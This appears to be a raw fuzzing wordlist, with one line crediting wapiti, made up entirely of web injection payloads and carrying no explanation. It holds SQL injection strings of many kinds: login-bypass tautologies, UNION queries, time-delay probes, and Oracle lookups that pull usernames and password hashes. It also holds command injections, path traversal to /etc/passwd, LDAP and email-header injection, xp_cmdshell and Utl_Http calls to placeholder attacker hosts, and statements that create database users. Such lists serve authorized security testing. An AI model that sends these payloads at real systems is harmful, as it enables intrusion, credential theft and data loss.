or a=a
select name, tbname, coltype from sysibm.syscolumns;
',NULL)%20waitfor%20delay%20'0:0:20'%20--
delete
9999'||(select 99999999 from pg_sleep(15))||'9999
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'OR '' = '	Allows authentication without a valid username.
& ping -n 30 127.0.0.1 &
1' and non_existant_table = '1
select versionnumber, version_timestamp from sysibm.sysversions;
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
%0a+dir+c:%2f
'))%20waitfor%20delay%20'0:0:20'%20/*
' select * from information_schema.tables--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
' or '1'='1
(select like('abcdefg',upper(hex(randomblob(150000000)))))
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
../../../../../../../../../../etc/passwd
' union+select+banner,null,null,null,null+from+v$version√ø
..\..\..\..\..\..\..\..\..\..\windows\win.ini
' or username like char(37);
--sp_password
or 0=0 #"
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
`ping 127.0.0.1`
%7C
select current_setting('log_connections');
");waitfor delay '0:0:__TIME__'--
hi or a=a
x' AND members.email IS NULL; --
' or username like '%
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
\x27UNION SELECT
distinct
' or 'W'='W' --
" or 0=0 --
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
and 0=benchmark(3000000,MD5(1))%20--
y ' or 10 > 9
%28
$+|+Dir+c:%255c
' or ''qwer'' --'
; id
|/usr/bin/id
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
@var select @var as var into temp end --
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
ping -i 30 127.0.0.1
' or ''qwer'' in (select @@version)--
")))) waitfor delay '0:0:20' /*
; ping 127.0.0.1 ;
;id
a' or 3=3--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
or 4479=4479 or ""=
') or 1=1 or ('1'='1
|id
%0a+dir+c:%255c
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
$;/usr/bin/id
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
%0a id %0a
tz_offset
' or 'whatever' in ('whatever')
:response.write 111111
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
"a"" or 3=3--"
'create user name identified by 'pass123' --
desc
"))) waitfor delay '0:0:20' /*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
& ping -i 30 127.0.0.1 &
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
')%20waitfor%20delay%20'0:0:20'%20--
sleep(__TIME__)#
1 or benchmark(10000000,MD5(1))#
' or 4479=4479 or ''='
y ' or 2 between 1 and 3
hi' or 1=1 --
') or pg_sleep(__TIME__)--
&
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
' or 1 in (@@version)--
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
999999)) or 1=1 or ((1=1
select current_setting('port');
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
")))))) waitfor delay '0:0:20' --
1'1
handler
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
\nid|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
9999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"9999
' or user like '%
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
' or 4479=4479 /*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"a"" or 1=1--"
' grant connect to name; grant resource to name; --
' or 1 in (select @@version)--
9999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'9999
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' UNION SELECT
'))) and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20--
(
`id`
%20or%20x=x
select version();
waitfor delay '0:0:20' --
%2A%7C
a' waitfor delay '0:0:10'--
select current_setting('log_statement');
to_timestamp_tz
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
"))) waitfor delay '0:0:20' --
' union select * from users where login = char(114,111,111,116);
*(|(mail=*))
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
a;/usr/bin/id;
or%201=1
bfilename
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
$+|+Dir+c:%2f
`ping 127.0.0.1`
23 OR 1=1
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
\n/usr/bin/id\n
%0Aid%0A
select current_database();
' or 3=3
") or sleep(__TIME__)="
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test
' or 'text' > 't'
hi') or ('a'='a
*(|(objectclass=*))
))%20waitfor%20delay%20'0:0:20'%20--
') or benchmark(10000000,MD5(1))#
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
x' or 1=1 or 'x'='y
| id
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20--
(sqlattempt2)
echo 111111
select current_user;
; or '''qwer'''='''qwer'''
& ping -n 30 127.0.0.1 &
)) and 0=benchmark(3000000,MD5(1))%20/*
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
*(|(objectclass=*))
1 or 1=1--
' union (select NULL, (select @@version)) --
x' AND email IS NULL; --
' or ''='
' || myappadmin.adduser('admin', 'newpass') || '
!
'))) and 0=benchmark(3000000,MD5(1))%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
%2A%28%7C%28mail%3D%2A%29%29
")) and 0=benchmark(3000000,MD5(1))%20--
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
) or (a=a
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
?
' or 0=0 --
insert
;/usr/bin/id\n
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
1)) or pg_sleep(__TIME__)--
' or '4479'='4479
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
9999"+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+"9999
or 4479=4479 --
1°… OR '1'='1
xsstest
|id|
") or benchmark(10000000,MD5(1))#
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
) and 0=benchmark(3000000,MD5(1))%20/*
"))%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
select
') and 0=benchmark(3000000,MD5(1))%20/*
' or 1=1
'+sqlvuln
//
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
1 uni/**/on select all from where
+|+Dir+c:\
or 4479=4479
a;id;
031003000270000
@*
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
' or 1=1 --
'; exec xp_regread
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
truncate
a' waitfor delay '0:0:10'--
" and 0=benchmark(3000000,MD5(1))%20--
1'or'1
or 0=0 --
')) and 0=benchmark(3000000,MD5(1))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
x' AND email IS NULL; --
anything' OR 'x'='x
a'
(select benchmark(15000000,md5(0x4e446b6e))-9999) as test
xyz'  OR 1%253D1+--
9999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='9999
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
+|+Dir+c:%255c
cat /etc/passwd
select current server from sysibm.sysdummy1;
or 4479=4479 #
%20'sleep%2050'
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' or 4 > 1
" or 4479=4479 --
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
xsstest%00"<>'
or
0 or 1=1
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
1)) or benchmark(10000000,MD5(1))#
' group by userid having 1=1--
//*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
select name from sysibm.systables;
' or userid like '%
' (select top 1
" or 0=0 --
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
desc
' union+select+owner,null,null,null,null+from+all_tables√ø
9999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'9999
'%20or%20''='
1 and 1=1
%26%26+|+dir c:%255c
") waitfor delay '0:0:20' /*
# from wapiti
select session_user from sysibm.sysdummy1;
%0A/usr/bin/id%0A
")%20waitfor%20delay%20'0:0:20'%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'))) waitfor delay '0:0:20' /*
<youremail>%0d%0aBcc:<youremail>
or%201=1 --
exec master..xp_cmdshell 'ping+<attackerip>'
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
y ' or 3=3
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
select @@microsoftversione
) and 0=benchmark(3000000,MD5(1))%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
..\..\..\..\..\..\..\..\..\..\etc\passwd
(select like('abcdefg',upper(hex(randomblob(150000000))))) as test
") or pg_sleep(__TIME__)--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
a|/usr/bin/id
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' or 4479=4479 --
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) as test
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
select session_user;
' or 4479=4479 #
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
%20or%20x=x
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
),NULL)%20waitfor%20delay%20'0:0:20'%20--
' or 4479=4479--
</foo>
asc
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
select grantee from syscat.dbauth;
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
update
t'exec master..xp_cmdshell 'nslookup www.google.com'--
")))) and 0=benchmark(3000000,MD5(1))%20/*
' or benchmark(10000000,MD5(1))#
1 or 1=1
\nid\n
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
' or '7659'='7659
||/usr/bin/id|
@variable
a;id|
|
truncate
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
bfilename
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
1' and 1=(select count(*) from tablenames); --
') or ('a'='a
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
" or sleep(__TIME__)="
')))) and 0=benchmark(3000000,MD5(1))%20/*
or%201=1
9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999
select current_setting('password_encryption');
or a=a
or
%26%26+|+dir c:%2f
yor 'a'='a' --
/
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
a|/usr/bin/id
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
'; waitfor delay '0:30:0'--
9999" or benchmark(15000000,md5(0x4e446b6e)) or "0"="9999
sqlvuln;
||+dir|c:\
,@variable
' union+select+global_name,null,null,null,null+from+global_name√ø
' or uid like '%
or 1=1--
select current_setting('port');
or 4479=4479 #"
) and 0=benchmark(3000000,MD5(1))%20%23
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
?'
))) and 0=benchmark(3000000,MD5(1))%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
;id;
' having 1=1--
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
') or ('a'='a
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' or 4479 in (select @@version)--
y ' or 119 > 30000001
1) or pg_sleep(__TIME__)--
hi or a=a
or 0=0 #
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
9999"||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||"9999
select * from pg_group;
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
';waitfor delay '0:0:__TIME__'--
' and 1 in (select var from temp)--
' or (EXISTS)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
9999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='9999
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
)) and 0=benchmark(3000000,MD5(1))%20%23
'OR 1=1--
x' AND members.email IS NULL; --
a)|id;
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
;id;
../../../../../../../../../../boot.ini
0 or 1=1
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
' or 'W'='W' #
| ping -i 30 127.0.0.1 |
order by
'||Utl_Http.request('http://<yourservername>') from dual--
')%20or%20('x'='x
" waitfor delay '0:0:20' --
" or 4479=4479--
or 'W'='W' --
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)
')))) waitfor delay '0:0:20' --
' or uname like '%
to_timestamp_tz
'))%20waitfor%20delay%20'0:0:20'%20--
a' or 'a' = 'a
xyz' OR 1%3D1+--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"hi"") or (""a""=""a"
") waitfor delay '0:0:20' --
a'
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
' --
y' AND 1=(SELECT COUNT(*) FROM tabname); --
)))) waitfor delay '0:0:20' --
or 4479=4479--
(select 99999999 from pg_sleep(15))
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
1 waitfor delay '0:0:10'--
or 1=1
9999"||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||"9999
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
999999))) or 1=1 or (((1
' or 1 --'
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
');waitfor delay '0:0:__TIME__'--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
& id
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
(sqlvuln)
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
")) and 0=benchmark(3000000,MD5(1))%20/*
' UNION SELECT
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) as test
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
' or ''qwer''=''qwer''--
delete
last
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
@variable
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
//
' or 2 between 1 and 3
))) and 0=benchmark(3000000,MD5(1))%20--
' or 0=0 #
\'; desc users; --
' -- &password=
'
' or '4479'='4479'--
"))) and 0=benchmark(3000000,MD5(1))%20%23
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
||/usr/bin/id;
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
' UNION ALL SELECT
"a"" or 1=1--"
<youremail>%0d%0aCc:<youremail>
(sqlattempt2)
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
')))))) waitfor delay '0:0:20' /*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
*(|(mail=*))
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
copy myfile from '/etc/passwd';
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
'
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
") and 0=benchmark(3000000,MD5(1))%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
x' AND 1=(SELECT COUNT(*) FROM tabname); --
select current_setting('config_file');
select current_setting('virtual_host');
' or ''qwer''/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
')%20or%20('x'='x
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
*/*
& id
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
" or 'W'='W' --
'/**/or/**/''qwer''/**/=/**/''qwer''
1;SELECT%20*
' or 0=0 #
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
pwd
y' AND email IS NULL; --
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
`id`
"a"" or 3=3--"
" or "a"="a
y' AND userid IS NULL; --
$+|+Dir+c:\
a);id;
' or 4479 --'
"));waitfor delay '0:0:__TIME__'--
' or 1=1 or '1'='1
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*°ØXOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR°Ø|°±XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR°±*/
exec(@s)
1||Utl_Http.request('http://<yourservername>') from dual--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23